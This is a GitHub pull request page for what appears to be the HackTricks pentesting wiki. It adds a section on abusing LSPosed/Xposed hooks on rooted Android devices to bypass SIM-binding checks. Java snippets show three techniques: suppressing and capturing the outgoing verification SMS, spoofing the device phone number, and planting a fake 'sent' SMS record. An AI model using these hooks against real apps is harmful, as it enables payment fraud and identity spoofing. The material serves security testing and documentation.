Skip to content

Weaponizing LSPosed Remote SMS Injection and Identity Spoofi... #2026

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
carlospolop wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Weaponizing LSPosed Remote SMS Injection and Identity Spoofi... #2026

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
65 changes: 64 additions & 1 deletion ...g/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -334,6 +334,69 @@ apk-mitm app.apk
install-burp-certificate.md
{{#endref}}


## LSPosed/Xposed Hooking Abuse (Telephony/SMS)

On rooted devices, LSPosed/Xposed modules can hook Java telephony/SMS APIs at runtime, keeping the APK unmodified on disk while fully controlling what the app sees. This is commonly abused to bypass SIM‑binding flows that trust local telephony APIs or local SMS provider state.

Key primitives
- **Suppress outgoing verification SMS** while exfiltrating the token by short‑circuiting `SmsManager.sendTextMessage` in `beforeHookedMethod`.
- **Spoof MSISDN/line number** by forcing `TelephonyManager.getLine1Number()` and `SubscriptionInfo.getNumber()` to return an attacker‑controlled value.
- **Plant a fake “Sent” record** in the SMS provider so apps that check local SMS history see a successful send even if the carrier never received it.

Example: block SMS dispatch and capture content
```java
XposedHelpers.findAndHookMethod(
"android.telephony.SmsManager",
lpparam.classLoader,
"sendTextMessage",
String.class, String.class, String.class, PendingIntent.class, PendingIntent.class,
new XC_MethodHook() {
protected void beforeHookedMethod(MethodHookParam param) {
String body = (String) param.args[2];
// exfiltrate body to operator channel
param.setResult(null); // suppress real SMS send
}
}
);
```

Example: spoof device phone number
```java
XposedHelpers.findAndHookMethod(
"android.telephony.TelephonyManager",
lpparam.classLoader,
"getLine1Number",
new XC_MethodHook() {
protected void afterHookedMethod(MethodHookParam param) {
param.setResult(spoofedMsisdn);
}
}
);
```
```java
XposedHelpers.findAndHookMethod(
"android.telephony.SubscriptionInfo",
lpparam.classLoader,
"getNumber",
new XC_MethodHook() {
protected void afterHookedMethod(MethodHookParam param) {
param.setResult(spoofedMsisdn);
}
}
);
```

Example: inject a fake “Sent” SMS record
```java
ContentValues v = new ContentValues();
v.put("address", dest);
v.put("body", body);
v.put("type", 2); // sent
v.put("status", 0); // success
context.getContentResolver().insert(Uri.parse("content://sms/sent"), v);
```

## Handy command cheat‑sheet

```bash
Expand Down Expand Up @@ -396,5 +459,5 @@ Notes
- [phantom-frida (stealth Frida server builder)](https://github.com/TheQmaks/phantom-frida)
- [Frida OkHttp4 SSL pinning bypass script](https://github.com/Zero3141/Frida-OkHttp-Bypass)
- [XDA guide to strong Play Integrity bypass (2025)](https://xdaforums.com/t/updated-11-17-2025-guide-get-strong-integrity-fix-banking-apps-revolut-google-wallet-android-16-working.4753805/)

- [Weaponizing LSPosed: Remote SMS Injection and Identity Spoofing in Modern Payment Ecosystems](https://www.cloudsek.com/blog/weaponizing-lsposed-remote-sms-injection-and-identity-spoofing-in-modern-payment-ecosystems-2)
{{#include ../../banners/hacktricks-training.md}}